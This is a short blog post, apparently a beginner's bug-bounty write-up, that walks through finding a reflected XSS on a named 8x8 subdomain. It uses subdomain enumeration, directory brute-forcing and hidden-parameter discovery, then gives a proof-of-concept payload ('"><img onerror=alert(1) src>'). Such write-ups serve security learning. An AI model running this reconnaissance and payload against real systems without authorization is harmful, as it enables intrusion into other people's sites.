Get Reflected XSS within 3 minutes

Gökhan Güzelkokar
Feb 12 · 2 min read

Hi guys. I found xss on 8x8 within 3 minutes and I want to share it step by step. I am writing these write-ups for beginners like me. I think I will learn more as I write and I love it.

STEP 1 — Subdomain Enumeration

%.%.%.%.%.8x8.com

Descend as deep as you can. Now you can use any tool for enumeration such as assetfinder, sublist3r, subfinder etc. I use assetfinder with httprobe..

assetfinder -subs-only | httprobe

A subdomain wandering alone :)

Here is our target : client-beta.global.chalet.8x8.com

STEP — 2 Directory discovery

You can use filebuster, dirsearch or gobuster . I use dirsearch..

dirsearch.py -u “client-beta.global.chalet.8x8.com” -e html,json

STEP — 3 Hidden parameters are gold

🔥 :bad_params!! Let’s use arjun to find hidden parameters.

Now we have a get parameter on the blank page. 👌 Let’s try to get XSS !!

Payload : “><img onerror=alert(1) src>

Thank you !!!

Gökhan Güzelkokar

Written by

ISTE https://twitter.com/gkhck_ https://m.youtube.com/channel/UCF75UK6iUcHxUdC8OMw7w4A

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade